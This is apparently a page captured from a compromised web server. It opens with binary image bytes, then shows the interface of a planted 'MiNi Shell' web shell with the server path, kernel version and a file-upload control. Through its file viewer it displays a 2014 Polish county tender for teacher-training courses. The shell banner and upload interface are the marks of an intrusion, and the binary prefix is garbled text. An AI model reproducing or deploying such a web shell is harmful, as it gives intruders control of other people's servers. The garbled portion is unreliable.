JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140304/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140304/72106-N-2014.html

<p class="kh_header"><b>Tomaszów Mazowiecki: DOSKONALENIE NAUCZYCIELI
 w ramach projektu pn.: Nowe jutro, lepsze jutro - kompleksowy system doskonalenia Nauczycieli i Dyrektorów w Powiecie Tomaszowskim</b><br>
<b>Numer ogłoszenia: 72106 - 2014; data zamieszczenia: 04.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat  Tomaszowski , ul. Św. Antoniego 41, 97-200 Tomaszów Mazowiecki, woj. łódzkie, tel. 44 7242127, faks 44 725 28 01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-tomaszowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSKONALENIE NAUCZYCIELI
 w ramach projektu pn.: Nowe jutro, lepsze jutro - kompleksowy system doskonalenia Nauczycieli i Dyrektorów w Powiecie Tomaszowskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie składa się z sześciu oddzielnych części. Zakres wykonywanych zadań obejmował będzie w szczególności: 
a)  przeprowadzenie szkolenia,
b)  przygotowanie materiałów szkoleniowych,
c)  dojazd na miejsce szkolenia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I - doskonalenie nauczycieli - 1 (111 godzin)
a) min. 200 godz. zrealizowanego wsparcia dla osób dorosłych zbieżnego z tematyką określoną w  poniższej tabeli, (wykaz usług szkoleniowych), 
b) min. 100 godzin doświadczenia we współpracy z min. 3 szkołami/przedszkolami, (wykaz usług), 
c) doświadczenie w pracy z dzieckiem w wieku przedszkolnym i wczesnoszkolnym, (wykaz usług).

L.p.	Przewidywana tematyka szkoleń	Liczba godzin
1	Uczymy się bawiąc - techniki aktywne w pracy z dziećmi przedszkolnymi  	6
2	Metoda projektu w pracy z dziećmi przedszkolnymi	12
3	Skrzynia pełna różności - metody i ćwiczenia rozwijające twórcze myślenie dzieci przedszkolnych	12
4	Zabawy, pląsy w pracy z dziećmi w wieku 3-6 lat	6
5	Praca z uczniem metodami aktywnymi wspomagającymi osiąganie sukcesu. Rozwijanie twórczego i kreatywnego myślenia uczniów	6
6	Za siedmioma górami - wykorzystanie bajki i relaksacji w pracy  z dzieckiem	6
7	Pedagogika zabawy w pracy z małym dzieckiem	12
8	Możliwości psychofizycznych dzieci w wieku przedszkolnym w obliczu wymagań stawianych przed 6- latkiem	3
9	Pedagogika zabawy w pracy z dzieckiem w wieku przedszkolnym	6
10	Metody i techniki aktywizujące dzieci w wieku przedszkolnym	6
11	Nowatorskie metody pracy - metoda projektu - nabywanie umiejętności stosowania ich w codziennej pracy z dziećmi	6
12	Rola, sposoby i formy motywacji dzieci w wieku szkolnym /wielopoziomowość nauczania/	3
13	Metodologia pracy z uczniem na różnych etapach kształcenia  (dobór metod pracy w zależności od  predyspozycji, wieku, możliwości intelektualnych uczniów)	3
14	Rola rodziny w motywowaniu dzieci do nauki na różnych etapach kształcenia	3
15	Jak pomóc uczniowi osiągnąć sukces?	3
16	Rozwój psychofizyczny i możliwości percepcyjne uczniów najmłodszych w szkole, higiena pracy dziecka w młodszym wieku szkolnym	6
17	Metodologia pracy z uczniem 6-letnim  ( dobór metod pracy) dla nauczycieli klas I- III oraz uczących przedmiotów- wychowanie fizyczne, języki, religia, wychowawcy świetlicy	3
18	Jak wspierać i motywować dzieci młodsze do nauki szkolnej	3
19	Jak pracować w klasach zróżnicowanych wiekowo	3
20	Gry i zabawy rozwijające umiejętności matematyczne	3


Część II - doskonalenie nauczycieli - 3 (63 godzin)
a) min. 200 godz. zrealizowanego wsparcia dla osób dorosłych zbieżnego z tematyką określoną w  poniższej tabeli, (wykaz usług szkoleniowych), 
b) min. 100 godzin doświadczenia we współpracy z min. 3 szkołami/przedszkolami, (wykaz usług), 
c) doświadczenie w pracy z dzieckiem w wieku przedszkolnym i wczesnoszkolnym oraz 
z dzieckiem o specjalnych potrzebach edukacyjnych, (wykaz usług).

L.p.	Przewidywana tematyka szkoleń	Liczba godzin
1	Jak radzić sobie w sytuacjach konfliktowych?	3
2	Jak rozpoznać ryzyko specyficznych trudności w uczeniu się u dzieci z klas młodszych?	3
3	Zaburzenia zachowania i agresja u dzieci w wieku przedszkolnym	6
4	Jak pomóc rodzicom dzieci ze specjalnymi potrzebami edukacyjnymi	6
5	Praca z dzieckiem o specjalnych potrzebach edukacyjnych	3
6	Praca z uczniem słabym niezmotywowanym. Praca z uczniem zdolnym niezmotywowanym.	3
7	Praca z dzieckiem wycofanym	3
8	Motywowanie ucznia słabego do osiągania sukcesu	3
9	Motywowanie ucznia z trudnościami edukacyjnymi  do systematycznej pracy i do osiągania sukcesu na miarę swoich możliwości	6
10	Umiejętność rozwiązywania sytuacji konfliktowych w grupie  dorosłych i dzieci	3
11	Metody  pracy z dziećmi o różnych potrzebach edukacyjnych- wady wymowy, nadpobudliwość, orzeczenia o niepełnosprawności;  uczeń zdolny	3
12	Rozwój psychomotoryczny dzieci a potrzeby edukacyjne w wieku przedszkolnym	3
13	Jak interpretować rysunki dziecka?	3
14	Wspomaganie dzieci w rozumieniu tego, co trudne - w skupieniu uwagi, ćwiczeniu pamięci i wspomaganiu zapamiętywania informacji uporządkowanych	3
15	Stosowanie aktywizujących metod pracy na zajęciach z: języka polskiego, języka obcego, matematyki, edukacji wczesnoszkolnej, w-f, przyrody i techniki	6
16	Organizacja procesu lekcyjnego z uwzględnieniem zróżnicowanego poziomu opanowania wiedzy	6

Część III - doskonalenie nauczycieli - 8 (45 godzin)
a) min. 200 godz. zrealizowanego wsparcia dla osób dorosłych zbieżnego z tematyką określoną w  poniższej tabeli, (wykaz usług szkoleniowych), 
b) min. 100 godzin doświadczenia we współpracy z min. 3 szkołami/przedszkolami, (wykaz usług), 
c) doświadczenie w pracy z uczniami na III i IV etapie edukacyjnym, (wykaz usług)
d) doświadczenie w pracy z dzieckiem w wieku przedszkolnym i wczesnoszkolnym, (wykaz usług), 
e) doświadczenie w prowadzeniu szkoleń z zakresu technik szybkiego zapamiętywania, uczenia się i aktywizujących metod pracy, (wykaz usług).

L.p.	Przewidywana tematyka szkoleń	Liczba godzin
1	Techniki efektywnego uczenia się i zapamiętywania.	9
2	Najnowsze techniki uczenia się, zapamiętywania i metody aktywizujące oraz narzędzia do motywowania.	15
3	Techniki nauczania oraz metody aktywizujące 	12
4	Psychologiczne aspekty motywowania uczniów do nauki 	6
5	Praca z uczniem o specyficznych trudnościach w uczeniu się	3


Część IV - doskonalenie nauczycieli - 12 (24 godziny)
a) min. 200 godz. zrealizowanego wsparcia dla osób dorosłych zbieżnego z tematyką określoną w  poniższej tabeli, (wykaz usług szkoleniowych), 
b) min. 100 godzin doświadczenia we współpracy z min. 3 szkołami/przedszkolami, (wykaz usług), 
c) doświadczenie w administrowaniu portali lub platform e-learningowych, w tym konfigurowanie ustawień i tworzenie narzędzi, (wykaz usług).

L.p.	Przewidywana tematyka szkoleń	Liczba godzin
1	Obsługa tablicy interaktywnej i wykorzystanie innych metod aktywizujących	3
2	Praca z tablicą interaktywną - tworzenie testów	6
3	Obsługa i praca na platformie e-learningowej	6
4	Praca na platformie e-learningowej (platforma moodle) na poziomie podstawowym i zaawansowanym	9


Część V - doskonalenie nauczycieli - 28 (9 godzin)
a) min. 200 godz. zrealizowanego wsparcia dla osób dorosłych zbieżnego z tematyką określoną w  poniższej tabeli, (wykaz usług szkoleniowych), 
b) min. 100 godzin doświadczenia we współpracy z min. 3 szkołami/przedszkolami, (wykaz usług), 
c) doświadczenie w pisaniu wniosków aplikacyjnych (wykaz usług).

L.p.	Przewidywana tematyka szkoleń	Liczba godzin
1	Pozyskiwanie z sukcesem środków finansowych z różnych źródeł (nie tylko unijnych), nauka pisania wniosków o pozyskanie środków finansowych	9


Część VI - doskonalenie nauczycieli - 29 (6 godzin)
a) min. 200 godz. zrealizowanego wsparcia dla osób dorosłych zbieżnego z tematyką określoną w  poniższej tabeli, (wykaz usług szkoleniowych), 
b) min. 100 godzin doświadczenia we współpracy z min. 3 szkołami/przedszkolami, (wykaz usług), 
c) doświadczenie w prowadzeniu szkoleń z wykorzystaniem technik NLP  (wykaz usług).

L.p.	Przewidywana tematyka szkoleń	Liczba godzin
1	Skuteczne techniki uczenia się i zapamiętywania - NLP	6</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I - doskonalenie nauczycieli - 1 (111 godzin)
a) co najmniej tytuł mgr psychologii lub mgr pedagogiki, w zakresie pedagogiki wieku dziecięcego, (wykaz osób) - kserokopia dyplomu przy podpisywaniu umowy, 
b) ukończył/ła kursy/szkolenia z zakresu animacji czasu wolnego (lub animacji zabawy),  (wykaz osób), kserokopia dokumentu przy podpisywaniu umowy, 
c) uprawnienia specjalisty ds. rozwijania inteligencji wielorakich, (wykaz osób), kserokopia dokumentu potwierdzającego kwalifikacje przy podpisywaniu umowy, 

Część II - doskonalenie nauczycieli - 3 (63 godzin)
a) co najmniej tytuł mgr psychologii (wykaz osób) - kserokopia dyplomu przy podpisywaniu umowy, 
b) ukończony kurs/szkolenie z zakresu psychoterapii lub studia, których zakres obejmował tematykę psychoterapii (wykaz osób), kserokopia dokumentu przy podpisywaniu umowy 

Część III - doskonalenie nauczycieli - 8 (45 godzin)
a) wykształcenie co najmniej wyższe magisterskie, (wykaz osób) - kserokopia dyplomu przy podpisywaniu umowy,  
b) kompetencje w zakresie technik szybkiego zapamiętywania, uczenia się i aktywizujących metod pracy (wykaz osób), kserokopia dokumentu potwierdzającego kwalifikacje przy podpisywaniu umowy,

Część IV - doskonalenie nauczycieli - 12 (24 godziny)
a) co najmniej tytuł mgr informatyki lub studia podyplomowe z zakresu informatyki (wykaz osób) - kserokopia dyplomu przy podpisywaniu umowy, 
b) ukończył/ła kursy/szkolenia z zakresu obsługi tablic interaktywnych na poziomie zawansowanym (w wymiarze min. 60 godz.), (wykaz osób), kserokopia dokumentu przy podpisywaniu umowy, 
e) ukończył/ła kursy/szkolenia z zakresu obsługi platformy e-learningowej (w wymiarze min. 60 godz.), np. platforma moodle, (wykaz osób), kserokopia dokumentu przy podpisywaniu umowy, 

Część V - doskonalenie nauczycieli - 28 (9 godzin)
a) wykształcenie co najmniej wyższe magisterskie, (wykaz osób) - kserokopia dyplomu przy podpisywaniu umowy,  
b) studia podyplomowe z zakresu pozyskiwania funduszy unijnych lub kurs kwalifikacyjny, (wykaz osób), kserokopia dokumentu potwierdzającego kwalifikacje przy podpisywaniu umowy, 

Część VI - doskonalenie nauczycieli - 29 (6 godzin)
a) co najmniej tytuł mgr psychologii, (wykaz osób) - kserokopia dyplomu przy podpisywaniu umowy,  
b) kwalifikacje w zakresie NLP (Neurolingwistycznego Programu), (wykaz osób), kserokopia dokumentu potwierdzającego kwalifikacje przy podpisywaniu umowy,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty i oświadczenia jakie Wykonawca będzie zobowiązany przedłożyć Zamawiającemu przed zawarciem umowy: poświadczona kserokopia dyplomu potwierdzająca wykształcenie oraz poświadczona kserokopia dokumentu potwierdzająca kwalifikacje Wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Kadra i zasoby - 40</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>4. Zmiana postanowień zawartej umowy może nastąpić w następujących przypadkach: a) dopuszczonej prawem zmian stron umowy lub oznaczenia stron umowy, b) zmiany wynagrodzenia w następstwie zmiany przepisów o podatku od towarów i usług (VAT), c) zmiany w zakresie przedmiotu zamówienia jeżeli konieczność wprowadzenia takich zmian jest skutkiem zmiany przepisów prawa, d) wynagrodzenie umowne może ulec zmianie w przypadku ograniczenia przez Zamawiającego zakresu przedmiotu umowy z przyczyn, których nie można było przewidzieć w chwili zawarcia umowy. e) Zmiany terminu realizacji przedmiotu umowy, która wystąpiła z przyczyn niezależnych od Zamawiającego i Wykonawcy. f) zmiana kadry szkoleniowej o równorzędnych kwalifikacjach zawodowych oraz doświadczeniu</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat-tomaszowski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe ul. Św. Antoniego 41 97-200 Tomaszów Maz. pokój nr 215.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.03.2014 godzina 10:00, miejsce: Starostwo Powiatowe ul. Św. Antoniego 41 97-200 Tomaszów Maz. Kancelaria- parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projektu pn. Nowe jutro, lepsze jutro - kompleksowy system doskonalenia Nauczycieli i Dyrektorów w Powiecie Tomaszowskim w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet III - Wysoka jakość systemu oświaty Działanie 3.5 - Kompleksowe wspomaganie rozwoju szkół...</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> część I - doskonalenie nauczycieli - 1 (111 godzin).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Przewidywana tematyka szkoleń	Liczba godzin
1	Uczymy się bawiąc - techniki aktywne w pracy z dziećmi przedszkolnymi  	6
2	Metoda projektu w pracy z dziećmi przedszkolnymi	12
3	Skrzynia pełna różności - metody i ćwiczenia rozwijające twórcze myślenie dzieci przedszkolnych	12
4	Zabawy, pląsy w pracy z dziećmi w wieku 3-6 lat	6
5	Praca z uczniem metodami aktywnymi wspomagającymi osiąganie sukcesu. Rozwijanie twórczego i kreatywnego myślenia uczniów	6
6	Za siedmioma górami - wykorzystanie bajki i relaksacji w pracy  z dzieckiem	6
7	Pedagogika zabawy w pracy z małym dzieckiem	12
8	Możliwości psychofizycznych dzieci w wieku przedszkolnym w obliczu wymagań stawianych przed 6- latkiem	3
9	Pedagogika zabawy w pracy z dzieckiem w wieku przedszkolnym	6
10	Metody i techniki aktywizujące dzieci w wieku przedszkolnym	6
11	Nowatorskie metody pracy - metoda projektu - nabywanie umiejętności stosowania ich w codziennej pracy z dziećmi	6
12	Rola, sposoby i formy motywacji dzieci w wieku szkolnym /wielopoziomowość nauczania/	3
13	Metodologia pracy z uczniem na różnych etapach kształcenia  (dobór metod pracy w zależności od  predyspozycji, wieku, możliwości intelektualnych uczniów)	3
14	Rola rodziny w motywowaniu dzieci do nauki na różnych etapach kształcenia	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Kadra i zasoby - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> część II - doskonalenie nauczycieli - 3 (63 godzin).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Przewidywana tematyka szkoleń	Liczba godzin
1	Jak radzić sobie w sytuacjach konfliktowych?	3
2	Jak rozpoznać ryzyko specyficznych trudności w uczeniu się u dzieci z klas młodszych?	3
3	Zaburzenia zachowania i agresja u dzieci w wieku przedszkolnym	6
4	Jak pomóc rodzicom dzieci ze specjalnymi potrzebami edukacyjnymi	6
5	Praca z dzieckiem o specjalnych potrzebach edukacyjnych	3
6	Praca z uczniem słabym niezmotywowanym. Praca z uczniem zdolnym niezmotywowanym.	3
7	Praca z dzieckiem wycofanym	3
8	Motywowanie ucznia słabego do osiągania sukcesu	3
9	Motywowanie ucznia z trudnościami edukacyjnymi  do systematycznej pracy i do osiągania sukcesu na miarę swoich możliwości	6
10	Umiejętność rozwiązywania sytuacji konfliktowych w grupie  dorosłych i dzieci	3
11	Metody  pracy z dziećmi o różnych potrzebach edukacyjnych- wady wymowy, nadpobudliwość, orzeczenia o niepełnosprawności;  uczeń zdolny	3
12	Rozwój psychomotoryczny dzieci a potrzeby edukacyjne w wieku przedszkolnym	3
13	Jak interpretować rysunki dziecka?	3
